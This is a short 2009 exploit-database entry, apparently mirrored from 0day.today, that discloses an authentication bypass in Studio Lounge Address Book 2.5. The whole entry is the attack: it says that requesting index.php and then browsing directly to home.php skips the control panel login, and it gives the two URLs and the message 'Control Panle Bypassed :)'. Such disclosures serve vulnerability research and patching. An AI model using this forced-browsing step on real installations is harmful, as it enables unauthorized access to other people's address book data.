id: 5087
date: 04/20/2009
title: Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability
author: ThE g0bL!N
cves: 

==================================================================
Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability
==================================================================



[~]Download: http://www.studiolounge.net/2007/08/17/address-book-25
  
 [~]Software: Studio Lounge Address Book 2.5
 [~]author: ThE g0bL!N
 [~] -----------------------------------------------------------------------------
  
Control Panel Bypass
-----------------------
exploit:
-------
http://loclahost/addressbook/index.php
Then go to url:
--------------
http://loclahost/addressbook/home.php
Control Panle Bypassed :)
[~]--------------------------------------------------------------------------------




#  0day.today [2023-03-22]  #